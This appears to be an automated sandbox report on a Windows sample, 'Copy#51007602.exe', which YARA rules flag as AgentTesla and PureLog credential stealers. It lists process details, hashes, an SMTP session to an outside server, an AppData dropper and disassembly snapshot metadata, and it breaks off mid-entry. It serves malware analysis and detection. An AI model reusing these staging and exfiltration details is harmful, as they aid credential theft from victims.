| May 27, 2024 15:16:47.789150000 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | QUIT |
| May 27, 2024 15:16:47.953844070 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 221 2.0.0 Bye |


                                              Target ID:0
                                              Start time:09:14:54
                                              Start date:27/05/2024
                                              Path:C:\Users\user\Desktop\Copy#51007602.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Copy#51007602.exe"
                                              Imagebase:0x210000
                                              File size:2'696'656 bytes
                                              MD5 hash:D503277EBD054E3A3CCFE906CAC2E6D8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2125383195.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2114770908.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:15:05
                                              Start date:27/05/2024
                                              Path:C:\Users\user\Desktop\Copy#51007602.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Copy#51007602.exe"
                                              Imagebase:0xd60000
                                              File size:2'696'656 bytes
                                              MD5 hash:D503277EBD054E3A3CCFE906CAC2E6D8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:4
                                              Start time:09:15:14
                                              Start date:27/05/2024
                                              Path:C:\Users\user\AppData\Roaming\itdtn.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\itdtn.exe"
                                              Imagebase:0xab0000
                                              File size:293'997'803 bytes
                                              MD5 hash:C62B7992DB97A6341DACBE7E3D936C74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:09:15:17
                                              Start date:27/05/2024
                                              Path:C:\Users\user\AppData\Roaming\itdtn.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\itdtn.exe"
                                              Imagebase:0xd70000
                                              File size:293'997'803 bytes
                                              MD5 hash:C62B7992DB97A6341DACBE7E3D936C74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false


                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:99.3%
                                                Signature Coverage:0%
                                                Total number of Nodes:404
                                                Total number of Limit Nodes:4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3443518476
                                                • Opcode ID: 1dafb25d08859bcfcf9a1110fe59117dd1727a800e8fd9aece10dabac808c204
                                                • Instruction ID: 70d8257ea944767a97557c752eddeb8380ba3cb213adc8fa03fd3bd9532fcbad
                                                • Opcode Fuzzy Hash: 1dafb25d08859bcfcf9a1110fe59117dd1727a800e8fd9aece10dabac808c204
                                                • Instruction Fuzzy Hash: ACB22534A00218DFDB18CFA9CD94BADB7B6FF48704F158599E605AB2A4DB71AC81CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                • API String ID: 0-324474496
                                                • Opcode ID: 5e58953f60f655d503e8bab3be41bec99c33dd0d42a8eedc316ff3e9f1b4c1d6
                                                • Instruction ID: 67b48604227319c0d23b5ff50a17dde9d6d4e23a9f80cbddbb8047120742c143
                                                • Opcode Fuzzy Hash: 5e58953f60f655d503e8bab3be41bec99c33dd0d42a8eedc316ff3e9f1b4c1d6
                                                • Instruction Fuzzy Hash: 51221834A00218DFDB24DFA5CD94BA9B7B2FF48305F1491A9D609AB2A5DB31AD81CF50

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$TJbq$Te]q$paq$xb`q
                                                • API String ID: 0-1123639052
                                                • Opcode ID: 5063b2ee2df3cab708a6aaabf71912d2b3ae2fa8c254c233bd368fcb62c6ec45
                                                • Instruction ID: 01aeff57474e7095e6d2db8b9aab7c4b2f0efb465f31c644e1d0061db4ea6d95
                                                • Opcode Fuzzy Hash: 5063b2ee2df3cab708a6aaabf71912d2b3ae2fa8c254c233bd368fcb62c6ec45
                                                • Instruction Fuzzy Hash: 7BA2B475E04228CFDB65CF69C984AD9BBB2BF89300F1581E9D509AB325DB319E81DF40

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJbq$Te]q$xb`q
                                                • API String ID: 0-1930611328
                                                • Opcode ID: 9615c52b3fbb29c23cb4434dddcdf2f6742eaf8259b739194eede2a7d79dc96c
                                                • Instruction ID: aa9b2b86d4617472f6ee7211631a8f4eddc55494542d3317e7052049ac318cb0
                                                • Opcode Fuzzy Hash: 9615c52b3fbb29c23cb4434dddcdf2f6742eaf8259b739194eede2a7d79dc96c
                                                • Instruction Fuzzy Hash: 2CC18675E006588FDB58DF6AC954ADDBBF2AF89300F14C1AAD809AB365DB305E81CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122803299.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ed0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q
                                                • API String ID: 0-3120983240
                                                • Opcode ID: 9c541714f5148f5e15d46e3b878e5fce18a82d82796a9cadcd62192542fdb5b6
                                                • Instruction ID: 9e4b88441d21ee493f4000f658b653e9e0c20903d8446d6c7c69e7c3537f0c5d
                                                • Opcode Fuzzy Hash: 9c541714f5148f5e15d46e3b878e5fce18a82d82796a9cadcd62192542fdb5b6
                                                • Instruction Fuzzy Hash: A3B29470D09349DFDB16DBA8C954BEEBFB1FF46304F14809AE501AB292C7786846CB61

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2$$]q
                                                • API String ID: 0-351713980
                                                • Opcode ID: fe8b2ffe61be921c6ef27f7862153ff2dfc00b08f6923fa222a6c02f0378e04c
                                                • Instruction ID: 6ef782b0d15798a09addfd1a3a09f82b469c9964c841fe558b62641d08035e5d
                                                • Opcode Fuzzy Hash: fe8b2ffe61be921c6ef27f7862153ff2dfc00b08f6923fa222a6c02f0378e04c
                                                • Instruction Fuzzy Hash: A4C2B1B4E40228CFCB64CF69C984BD9BBB6BF89304F1081EAD509A7255DB349E85CF40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122803299.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ed0000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125779245.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5480000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q
                                                • API String ID: 0-705557208
                                                • Opcode ID: caf090af4762fe927b025205bae3bf3f1578d22e76d0791dceb050ea728c152c
                                                • Instruction ID: 59140602d6faa97dc23f9d6d392222faa1817473af6699dc81f5eed52f24fb99
                                                • Opcode Fuzzy Hash: caf090af4762fe927b025205bae3bf3f1578d22e76d0791dceb050ea728c152c
                                                • Instruction Fuzzy Hash: EAF1B874B10218DFDB08EFA4D994A9DBBB2FF88304F518158E945AB3A5DB74EC42CB50

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq$Haq
                                                • API String ID: 0-2456560092
                                                • Opcode ID: 0696cf251fc06ad145cb34bb5864fbf5e32c3f54474bb92e60c0ee5a5740211b
                                                • Instruction ID: b1dc916cf5d09c29b51d2cdf666ffd005d7076a915bf6bd954934d986ac10456
                                                • Opcode Fuzzy Hash: 0696cf251fc06ad145cb34bb5864fbf5e32c3f54474bb92e60c0ee5a5740211b
                                                • Instruction Fuzzy Hash: 8CF16634A00209DFDB04EF64D99499EBBB2FF85304F118569E906AB365DB30FD42CB51

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: 8230a3aa7ea36a8323c6dfb48c6b4b761e9b0b002acad979227124472d2fa105
                                                • Instruction ID: 68df7b93425ba39ab9bdcac7a5c40aa8deabc7b858aa97b642f040da5b636460
                                                • Opcode Fuzzy Hash: 8230a3aa7ea36a8323c6dfb48c6b4b761e9b0b002acad979227124472d2fa105
                                                • Instruction Fuzzy Hash: 19229D30E00229DFDB05DFA9D850AEEBBB2FF58704F108515E951AB394DB39AD46CB90

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122803299.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ed0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q
                                                • API String ID: 0-3120983240
                                                • Opcode ID: b2e1f7bb1d0a56ed3dbe4bef076295243d8447e906444320b7d2210bb2e35a17
                                                • Instruction ID: 0f66579500f581ee23eb28b7a469a0e8afb4d9af4bcfc2d19424aa522cd76583
                                                • Opcode Fuzzy Hash: b2e1f7bb1d0a56ed3dbe4bef076295243d8447e906444320b7d2210bb2e35a17
                                                • Instruction Fuzzy Hash: 40E1F334E04218DFDB18DFA9E488AEDBBB2FF49316F10A569E406A7254DB356946CF00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pl]q$$]q
                                                • API String ID: 0-2369359564
                                                • Opcode ID: 1a2d29fba8def25143db50efa4750633adf7d354ffef9ce16c50d5e4ba5ce320
                                                • Instruction ID: e2d66ce95639c549b137a2dd7468dfebb0315710fa9eae0e57491647952f9877
                                                • Opcode Fuzzy Hash: 1a2d29fba8def25143db50efa4750633adf7d354ffef9ce16c50d5e4ba5ce320
                                                • Instruction Fuzzy Hash: 17B11430B401149FCB04DF29C884AAE7BF6AF89715B1144A9E605CB3B6DB71EC42CBA1

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq
                                                • API String ID: 0-3916115647
                                                • Opcode ID: c987a50b0fef184927bd162f4e5d4a7eaa1568f577d947d1236a9bb0d6369203
                                                • Instruction ID: da0ec150d211d2db0b55c1415e22b79abcd7eeed98c793b59060c177885a3266
                                                • Opcode Fuzzy Hash: c987a50b0fef184927bd162f4e5d4a7eaa1568f577d947d1236a9bb0d6369203
                                                • Instruction Fuzzy Hash: D2519D313002099FDB15AF28E894AAE3BA6FF94314F118169E905CB296DF35ED46CB90

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$Haq
                                                • API String ID: 0-3785302501
                                                • Opcode ID: 3bdb5fbb246207947ef01b79b5e28ca5c0cbf5e36e1ad40affd6b17830582963
                                                • Instruction ID: af9af1ad7f7fae1b7ec920ccf7d298c5f1760b4560c90fb4f74a1b340fb37adb
                                                • Opcode Fuzzy Hash: 3bdb5fbb246207947ef01b79b5e28ca5c0cbf5e36e1ad40affd6b17830582963
                                                • Instruction Fuzzy Hash: 3441E1317052548FD715AB28C954AAE7BF2FF86214B1580EAE109DB3A2DE35EC07CB91

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126459321.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5710000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,$=
                                                • API String ID: 0-1737935649
                                                • Opcode ID: 2ba7b5ff3ad42becde23d328e046c874e15a5b0fb0a2c69a52c53950b7ae55cf
                                                • Instruction ID: a9601ec36630f0ab3cbfd1aa1c50b5a646b29d617d1a76df21c7ed9cf10d0a26
                                                • Opcode Fuzzy Hash: 2ba7b5ff3ad42becde23d328e046c874e15a5b0fb0a2c69a52c53950b7ae55cf
                                                • Instruction Fuzzy Hash: 3CF0443494011ACFD760DB68D888BED76B1FF04315F6180E6D40DA3292C7384EC8AF02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: 84687541f1cd35dd200a22f1a5ef94135a629344e672f8e8ef69448b714f0f90
                                                • Instruction ID: b667d0464665567d4830c610872ff811b5b980b826cb0bc6dae4845436346316
                                                • Opcode Fuzzy Hash: 84687541f1cd35dd200a22f1a5ef94135a629344e672f8e8ef69448b714f0f90
                                                • Instruction Fuzzy Hash: A3521C75A002289FDB24DF68C941BDDBBF6BF88300F1581E9E549AB351DA30AD81CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (_]q
                                                • API String ID: 0-188044275
                                                • Opcode ID: 0646c1f8c7835d4e09f5014f48de7c2f2fd3b4133e2dd7e74f50005f05656642
                                                • Instruction ID: 13548ff9aac18a9e990dc412d32218a223d1fed59a8260cec6934b50094515be
                                                • Opcode Fuzzy Hash: 0646c1f8c7835d4e09f5014f48de7c2f2fd3b4133e2dd7e74f50005f05656642
                                                • Instruction Fuzzy Hash: 36228F35B002049FDB04DFA8D990AAEB7F2FF88314F148569EA059B3A6DB75ED41CB50
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f5c471548f83f81b76313e3d1fd9328653713948a2f4c3d637a782b1d5f960f0
                                                • Instruction ID: 8eeb6aea8f35809db535579c6a302768527d9fd8aac02b8a39d2110b3eb01b13
                                                • Opcode Fuzzy Hash: f5c471548f83f81b76313e3d1fd9328653713948a2f4c3d637a782b1d5f960f0
                                                • Instruction Fuzzy Hash: CAA10470D042188FDF20DFA9C8857EDBBF1BF09314F14A16AE859A7280EB749985CF85
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5500000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c83fbe75fad3a4268b935bbf480a096811512e1d5ae5c61c072bbd0003099b3d
                                                • Instruction ID: 1dcdc40d388edb78b7fa6aeb8a57e5457f5c7187f7533e8116c91d7177388af4
                                                • Opcode Fuzzy Hash: c83fbe75fad3a4268b935bbf480a096811512e1d5ae5c61c072bbd0003099b3d
                                                • Instruction Fuzzy Hash: 15A1F3B0D002299FDF20CFA9C8857EDBBF1BF09314F14A169E859A7280EB749985CF45
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05505BCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2126108804.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false
                                                Joe Sandbox IDA Plugin
